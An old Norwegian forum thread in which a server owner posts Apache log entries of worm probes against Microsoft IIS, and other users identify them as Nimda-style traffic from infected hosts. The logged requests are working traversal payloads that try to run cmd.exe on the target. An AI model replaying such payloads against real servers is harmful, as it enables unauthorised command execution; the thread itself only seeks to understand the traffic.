Du må være registrert og logget inn for å kunne legge ut innlegg på freak.no
X
LOGG INN
... eller du kan registrere deg nå
Dette nettstedet er avhengig av annonseinntekter for å holde driften og videre utvikling igang. Vi liker ikke reklame heller, men alternativene er ikke mange. Vær snill å vurder å slå av annonseblokkering, eller å abonnere på en reklamefri utgave av nettstedet.
AbonnerSkjul
Host1.no - Webhotell fra 29,-, virtuell server fra 249,-. 15% rabatt med rabattkode "nFF". Besøk oss på Host1.no!
  3 784
pii
pii's Avatar
204 1
9. mars 2002
får slike raid som dette på apache servern min av og til:

148.247.10.9 - - [09/Mar/2002:09:42:10 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 281
148.247.10.9 - - [09/Mar/2002:09:42:11 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 279
148.247.10.9 - - [09/Mar/2002:09:42:11 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289
148.247.10.9 - - [09/Mar/2002:09:42:12 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289
148.247.10.9 - - [09/Mar/2002:09:42:13 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
148.247.10.9 - - [09/Mar/2002:09:42:13 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320
148.247.10.9 - - [09/Mar/2002:09:42:14 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320
148.247.10.9 - - [09/Mar/2002:09:42:14 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe$
148.247.10.9 - - [09/Mar/2002:09:42:15 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
148.247.10.9 - - [09/Mar/2002:09:42:15 +0100] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
148.247.10.9 - - [09/Mar/2002:09:42:16 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
148.247.10.9 - - [09/Mar/2002:09:42:17 +0100] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
148.247.10.9 - - [09/Mar/2002:09:42:17 +0100] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 286
148.247.10.9 - - [09/Mar/2002:09:42:19 +0100] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 286
148.247.10.9 - - [09/Mar/2002:09:42:20 +0100] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
148.247.10.9 - - [09/Mar/2002:09:42:20 +0100] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303

er det nimda virus eller noe slikt?
virker som det er rettet mot webserveren til ms (iis)
noen som har peil?
metrom
rekylvinyl.no
779 11
9. mars 2002
du har rett. dette "angrepet" kommer fra virus/orm infiserte Microsoft IIS servere. (åå...så glad vi er i ms' sikkerhetspolitikk)

en ting du kan gjøre er å kontakte adminen på den ipen som vises å informere ham, eller bare ignorer det.

dette er helt uskadelig for linux&apache, er kun rettet mot MS IIS.
sharken
450 1
9. mars 2002
Jeg har slike angrep hele tiden på web-serverne min, både apache og iis

Det gjør ikke noen skade når man har de nyeste sikkerhetsoppdateringene til IIS, men det spiser litt båndbredde og kan føre til at det går litt saktere på linjen
Prazor
522 0
12. mars 2002
Må nok meddele og si at jeg også får slike angrep hver dag, selv om jeg bare har ISDN... (kjekt med smoothwall som kjører snort)... Kjipe ms hoes